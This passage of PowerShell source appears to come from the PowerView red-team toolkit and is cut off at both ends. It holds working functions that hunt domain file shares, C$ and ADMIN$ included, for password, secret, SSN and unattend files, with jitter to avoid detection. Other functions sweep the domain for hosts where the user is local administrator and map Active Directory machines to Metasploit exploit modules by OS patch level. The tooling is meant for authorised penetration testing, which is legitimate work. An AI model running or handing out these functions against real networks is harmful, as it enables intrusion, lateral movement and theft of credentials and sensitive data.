'unattend*.xml' in the name, .EXAMPLE PS C:\> Invoke-FileFinder -IncludeC Find readable files on the domain with 'pass', 'sensitive', 'secret', 'admin', 'login' or 'unattend*.xml' in the name, including C$ shares. .EXAMPLE PS C:\> Invoke-FileFinder -ShareList shares.txt -Terms accounts,ssn -OutFile out.csv Enumerate a specified share list for files with 'accounts' or 'ssn' in the name, and write everything to "out.csv" .LINK http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/ #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [Alias('Hosts')] [String[]] $ComputerName, [ValidateScript({Test-Path -Path $_ })] [Alias('HostList')] [String] $ComputerFile, [String] $ComputerFilter, [String] $ComputerADSpath, [ValidateScript({Test-Path -Path $_ })] [String] $ShareList, [Switch] $OfficeDocs, [Switch] $FreshEXEs, [Alias('Terms')] [String[]] $SearchTerms, [ValidateScript({Test-Path -Path $_ })] [String] $TermList, [String] $LastAccessTime, [String] $LastWriteTime, [String] $CreationTime, [Switch] $IncludeC, [Switch] $IncludeAdmin, [Switch] $ExcludeFolders, [Switch] $ExcludeHidden, [Switch] $CheckWriteAccess, [String] $OutFile, [Switch] $NoClobber, [Switch] $NoPing, [UInt32] $Delay = 0, [Double] $Jitter = .3, [String] $Domain, [String] $DomainController, [Switch] $SearchForest, [Switch] $SearchSYSVOL, [ValidateRange(1,100)] [Int] $Threads, [Switch] $UsePSDrive ) begin { if ($PSBoundParameters['Debug']) { $DebugPreference = 'Continue' } # random object for delay $RandNo = New-Object System.Random Write-Verbose "[*] Running Invoke-FileFinder with delay of $Delay" $Shares = @() # figure out the shares we want to ignore [String[]] $ExcludedShares = @("C$", "ADMIN$") # see if we're specifically including any of the normally excluded sets if ($IncludeC) { if ($IncludeAdmin) { $ExcludedShares = @() } else { $ExcludedShares = @("ADMIN$") } } if ($IncludeAdmin) { if ($IncludeC) { $ExcludedShares = @() } else { $ExcludedShares = @("C$") } } # delete any existing output file if it already exists if(!$NoClobber) { if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile } } # if there's a set of terms specified to search for if ($TermList) { ForEach ($Term in Get-Content -Path $TermList) { if (($Term -ne $Null) -and ($Term.trim() -ne '')) { $SearchTerms += $Term } } } # if we're hard-passed a set of shares if($ShareList) { ForEach ($Item in Get-Content -Path $ShareList) { if (($Item -ne $Null) -and ($Item.trim() -ne '')) { # exclude any "[tab]- commants", i.e. the output from Invoke-ShareFinder $Share = $Item.Split("`t")[0] $Shares += $Share } } } else { # if we're using a host file list, read the targets in and add them to the target list if($ComputerFile) { $ComputerName = Get-Content -Path $ComputerFile } if(!$ComputerName) { if($Domain) { $TargetDomains = @($Domain) } elseif($SearchForest) { # get ALL the domains in the forest to search $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } } else { # use the local domain $TargetDomains = @( (Get-NetDomain).name ) } if($SearchSYSVOL) { ForEach ($Domain in $TargetDomains) { $DCSearchPath = "\\$Domain\SYSVOL\" Write-Verbose "[*] Adding share search path $DCSearchPath" $Shares += $DCSearchPath } if(!$SearchTerms) { # search for interesting scripts on SYSVOL $SearchTerms = @('.vbs', '.bat', '.ps1') } } else { [array]$ComputerName = @() ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for hosts" $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController } # remove any null target hosts, uniquify the list and shuffle it $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } if($($ComputerName.Count) -eq 0) { throw "No hosts found!" } } } } # script block that enumerates shares and files on a server $HostEnumBlock = { param($ComputerName, $Ping, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive) Write-Verbose "ComputerName: $ComputerName" Write-Verbose "ExcludedShares: $ExcludedShares" $SearchShares = @() if($ComputerName.StartsWith("\\")) { # if a share is passed as the server $SearchShares += $ComputerName } else { # if we're enumerating the shares on the target server first $Up = $True if($Ping) { $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName } if($Up) { # get the shares for this host and display what we find $Shares = Get-NetShare -ComputerName $ComputerName ForEach ($Share in $Shares) { $NetName = $Share.shi1_netname $Path = '\\'+$ComputerName+'\'+$NetName # make sure we get a real share name back if (($NetName) -and ($NetName.trim() -ne '')) { # skip this share if it's in the exclude list if ($ExcludedShares -NotContains $NetName.ToUpper()) { # check if the user has access to this path try { $Null = [IO.Directory]::GetFiles($Path) $SearchShares += $Path } catch { Write-Verbose "[!] No access to $Path" } } } } } } ForEach($Share in $SearchShares) { $SearchArgs = @{ 'Path' = $Share 'SearchTerms' = $SearchTerms 'OfficeDocs' = $OfficeDocs 'FreshEXEs' = $FreshEXEs 'LastAccessTime' = $LastAccessTime 'LastWriteTime' = $LastWriteTime 'CreationTime' = $CreationTime 'ExcludeFolders' = $ExcludeFolders 'ExcludeHidden' = $ExcludeHidden 'CheckWriteAccess' = $CheckWriteAccess 'OutFile' = $OutFile 'UsePSDrive' = $UsePSDrive } Find-InterestingFile @SearchArgs } } } process { if($Threads) { Write-Verbose "Using threading with threads = $Threads" # if we're using threading, kick off the script block with Invoke-ThreadedFunction $ScriptParams = @{ 'Ping' = $(-not $NoPing) 'ExcludedShares' = $ExcludedShares 'SearchTerms' = $SearchTerms 'ExcludeFolders' = $ExcludeFolders 'OfficeDocs' = $OfficeDocs 'ExcludeHidden' = $ExcludeHidden 'FreshEXEs' = $FreshEXEs 'CheckWriteAccess' = $CheckWriteAccess 'OutFile' = $OutFile 'UsePSDrive' = $UsePSDrive } # kick off the threaded script block + arguments if($Shares) { # pass the shares as the hosts so the threaded function code doesn't have to be hacked up Invoke-ThreadedFunction -ComputerName $Shares -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } else { Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } } else { if($Shares){ $ComputerName = $Shares } elseif(-not $NoPing -and ($ComputerName.count -gt 1)) { # ping all hosts in parallel $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 } Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" $Counter = 0 $ComputerName | Where-Object {$_} | ForEach-Object { Write-Verbose "Computer: $_" $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) Write-Verbose "[*] Enumerating server $_ ($Counter of $($ComputerName.count))" Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $_, $False, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive } } } } function Find-LocalAdminAccess { <# .SYNOPSIS Finds machines on the local domain where the current user has local administrator access. Uses multithreading to speed up enumeration. Author: @harmj0y License: BSD 3-Clause .DESCRIPTION This function finds the local domain name for a host using Get-NetDomain, queries the domain for all active machines with Get-NetComputer, then for each server it checks if the current user has local administrator access using Invoke-CheckLocalAdminAccess. Idea stolen from the local_admin_search_enum post module in Metasploit written by: 'Brandon McCann "zeknox" ' 'Thomas McCarthy "smilingraccoon" ' 'Royce Davis "r3dy" ' .PARAMETER ComputerName Host array to enumerate, passable on the pipeline. .PARAMETER ComputerFile File of hostnames/IPs to search. .PARAMETER ComputerFilter Host filter name to query AD for, wildcards accepted. .PARAMETER ComputerADSpath The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER NoPing Switch. Don't ping each host to ensure it's up before enumerating. .PARAMETER Delay Delay between enumerating hosts, defaults to 0 .PARAMETER Jitter Jitter for the host delay, defaults to +/- 0.3 .PARAMETER Domain Domain to query for machines, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER SearchForest Switch. Search all domains in the forest for target users instead of just a single domain. .PARAMETER Threads The maximum concurrent threads to execute. .EXAMPLE PS C:\> Find-LocalAdminAccess Find machines on the local domain where the current user has local administrator access. .EXAMPLE PS C:\> Find-LocalAdminAccess -Threads 10 Multi-threaded access hunting, replaces Find-LocalAdminAccessThreaded. .EXAMPLE PS C:\> Find-LocalAdminAccess -Domain testing Find machines on the 'testing' domain where the current user has local administrator access. .EXAMPLE PS C:\> Find-LocalAdminAccess -ComputerFile hosts.txt Find which machines in the host list the current user has local administrator access. .LINK https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/ #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [Alias('Hosts')] [String[]] $ComputerName, [ValidateScript({Test-Path -Path $_ })] [Alias('HostList')] [String] $ComputerFile, [String] $ComputerFilter, [String] $ComputerADSpath, [Switch] $NoPing, [UInt32] $Delay = 0, [Double] $Jitter = .3, [String] $Domain, [String] $DomainController, [Switch] $SearchForest, [ValidateRange(1,100)] [Int] $Threads ) begin { if ($PSBoundParameters['Debug']) { $DebugPreference = 'Continue' } # random object for delay $RandNo = New-Object System.Random Write-Verbose "[*] Running Find-LocalAdminAccess with delay of $Delay" # if we're using a host list, read the targets in and add them to the target list if($ComputerFile) { $ComputerName = Get-Content -Path $ComputerFile } if(!$ComputerName) { [array]$ComputerName = @() if($Domain) { $TargetDomains = @($Domain) } elseif($SearchForest) { # get ALL the domains in the forest to search $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } } else { # use the local domain $TargetDomains = @( (Get-NetDomain).name ) } ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for hosts" $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController } # remove any null target hosts, uniquify the list and shuffle it $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } if($($ComputerName.Count) -eq 0) { throw "No hosts found!" } } # script block that enumerates a server $HostEnumBlock = { param($ComputerName, $Ping) $Up = $True if($Ping) { $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName } if($Up) { # check if the current user has local admin access to this server $Access = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName if ($Access.IsAdmin) { $ComputerName } } } } process { if($Threads) { Write-Verbose "Using threading with threads = $Threads" # if we're using threading, kick off the script block with Invoke-ThreadedFunction $ScriptParams = @{ 'Ping' = $(-not $NoPing) } # kick off the threaded script block + arguments Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads } else { if(-not $NoPing -and ($ComputerName.count -ne 1)) { # ping all hosts in parallel $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 } Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" $Counter = 0 ForEach ($Computer in $ComputerName) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False } } } } function Get-ExploitableSystem { <# .Synopsis This module will query Active Directory for the hostname, OS version, and service pack level for each computer account. That information is then cross-referenced against a list of common Metasploit exploits that can be used during penetration testing. .DESCRIPTION This module will query Active Directory for the hostname, OS version, and service pack level for each computer account. That information is then cross-referenced against a list of common Metasploit exploits that can be used during penetration testing. The script filters out disabled domain computers and provides the computer's last logon time to help determine if it's been decommissioned. Also, since the script uses data tables to output affected systems the results can be easily piped to other commands such as test-connection or a Export-Csv. .PARAMETER ComputerName Return computers with a specific name, wildcards accepted. .PARAMETER SPN Return computers with a specific service principal name, wildcards accepted. .PARAMETER OperatingSystem Return computers with a specific operating system, wildcards accepted. .PARAMETER ServicePack Return computers with a specific service pack, wildcards accepted. .PARAMETER Filter A customized ldap filter string to use, e.g. "(description=*admin*)" .PARAMETER Ping Switch. Ping each host to ensure it's up before enumerating. .PARAMETER Domain The domain to query for computers, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER Unconstrained Switch. Return computer objects that have unconstrained delegation. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE The example below shows the standard command usage. Disabled system are excluded by default, but the "LastLgon" column can be used to determine which systems are live. Usually, if a system hasn't logged on for two or more weeks it's been decommissioned. PS C:\> Get-ExploitableSystem -DomainController 192.168.1.1 -Credential demo.com\user | Format-Table -AutoSize [*] Grabbing computer accounts from Active Directory... [*] Loading exploit list for critical missing patches... [*] Checking computers for vulnerable OS and SP levels... [+] Found 5 potentially vulnerable systems! ComputerName OperatingSystem ServicePack LastLogon MsfModule CVE ------------ --------------- ----------- --------- --------- --- ADS.demo.com Windows Server 2003 Service Pack 2 4/8/2015 5:46:52 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails.... ADS.demo.com Windows Server 2003 Service Pack 2 4/8/2015 5:46:52 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... ADS.demo.com Windows Server 2003 Service Pack 2 4/8/2015 5:46:52 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... LVA.demo.com Windows Server 2003 Service Pack 2 4/8/2015 1:44:46 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails.... LVA.demo.com Windows Server 2003 Service Pack 2 4/8/2015 1:44:46 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... LVA.demo.com Windows Server 2003 Service Pack 2 4/8/2015 1:44:46 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... HVA.demo.com Windows Server 2003 Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails.... HVA.demo.com Windows Server 2003 Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... HVA.demo.com Windows Server 2003 Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... DB1.demo.com Windows Server 2003 Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails.... DB1.demo.com Windows Server 2003 Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... DB1.demo.com Windows Server 2003 Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... .EXAMPLE PS C:\> Get-ExploitableSystem | Export-Csv c:\temp\output.csv -NoTypeInformation How to write the output to a csv file. .EXAMPLE PS C:\> Get-ExploitableSystem -Domain testlab.local -Ping Return a set of live hosts from the testlab.local domain .LINK http://www.netspi.com https://github.com/nullbind/Powershellery/blob/master/Stable-ish/ADS/Get-ExploitableSystems.psm1 .NOTES Author: Scott Sutherland - 2015, NetSPI Modifications to integrate into PowerView by @harmj0y Version: Get-ExploitableSystem.psm1 v1.1 Comments: The technique used to query LDAP was based on the "Get-AuditDSComputerAccount" function found in Carols Perez's PoshSec-Mod project. The general idea is based off of Will Schroeder's "Invoke-FindVulnSystems" function from the PowerView toolkit. #> [CmdletBinding()] Param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [String] $ComputerName = '*', [String] $SPN, [String] $OperatingSystem = '*', [String] $ServicePack = '*', [String] $Filter, [Switch] $Ping, [String] $Domain, [String] $DomainController, [String] $ADSpath, [Switch] $Unconstrained, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) Write-Verbose "[*] Grabbing computer accounts from Active Directory..." # Create data table for hostnames, os, and service packs from LDAP $TableAdsComputers = New-Object System.Data.DataTable $Null = $TableAdsComputers.Columns.Add('Hostname') $Null = $TableAdsComputers.Columns.Add('OperatingSystem') $Null = $TableAdsComputers.Columns.Add('ServicePack') $Null = $TableAdsComputers.Columns.Add('LastLogon') Get-NetComputer -FullData @PSBoundParameters | ForEach-Object { $CurrentHost = $_.dnshostname $CurrentOs = $_.operatingsystem $CurrentSp = $_.operatingsystemservicepack $CurrentLast = $_.lastlogon $CurrentUac = $_.useraccountcontrol $CurrentUacBin = [convert]::ToString($_.useraccountcontrol,2) # Check the 2nd to last value to determine if its disabled $DisableOffset = $CurrentUacBin.Length - 2 $CurrentDisabled = $CurrentUacBin.Substring($DisableOffset,1) # Add computer to list if it's enabled if ($CurrentDisabled -eq 0) { # Add domain computer to data table $Null = $TableAdsComputers.Rows.Add($CurrentHost,$CurrentOS,$CurrentSP,$CurrentLast) } } # Status user Write-Verbose "[*] Loading exploit list for critical missing patches..." # ---------------------------------------------------------------- # Setup data table for list of msf exploits # ---------------------------------------------------------------- # Create data table for list of patches levels with a MSF exploit $TableExploits = New-Object System.Data.DataTable $Null = $TableExploits.Columns.Add('OperatingSystem') $Null = $TableExploits.Columns.Add('ServicePack') $Null = $TableExploits.Columns.Add('MsfModule') $Null = $TableExploits.Columns.Add('CVE') # Add exploits to data table $Null = $TableExploits.Rows.Add("Windows 7","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983") $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") $Null = $TableExploits.Rows.Add("Windows Server 2008 R2","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") $Null = $TableExploits.Rows.Add("Windows Vista","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983") $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691") $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") # Status user Write-Verbose "[*] Checking computers for vulnerable OS and SP levels..." # ---------------------------------------------------------------- # Setup data table to store vulnerable systems # ---------------------------------------------------------------- # Create data table to house vulnerable server list $TableVulnComputers = New-Object System.Data.DataTable $Null = $TableVulnComputers.Columns.Add('ComputerName') $Null = $TableVulnComputers.Columns.Add('OperatingSystem') $Null = $TableVulnComputers.Columns.Add('ServicePack') $Null = $TableVulnComputers.Columns.Add('LastLogon') $Null = $TableVulnComputers.Columns.Add('MsfModule') $Null = $TableVulnComputers.Columns.Add('CVE') # Iterate through each exploit $TableExploits | ForEach-Object { $ExploitOS = $_.OperatingSystem $ExploitSP = $_.ServicePack $ExploitMsf = $_.MsfModule $ExploitCVE = $_.CVE # Iterate through each ADS computer $TableAdsComputers | ForEach-Object { $AdsHostname = $_.Hostname $AdsOS = $_.OperatingSystem $AdsSP = $_.ServicePack $AdsLast = $_.LastLogon # Add exploitable systems to vul computers data table if ($AdsOS -like "$ExploitOS*" -and $AdsSP -like "$ExploitSP" ) { # Add domain computer to 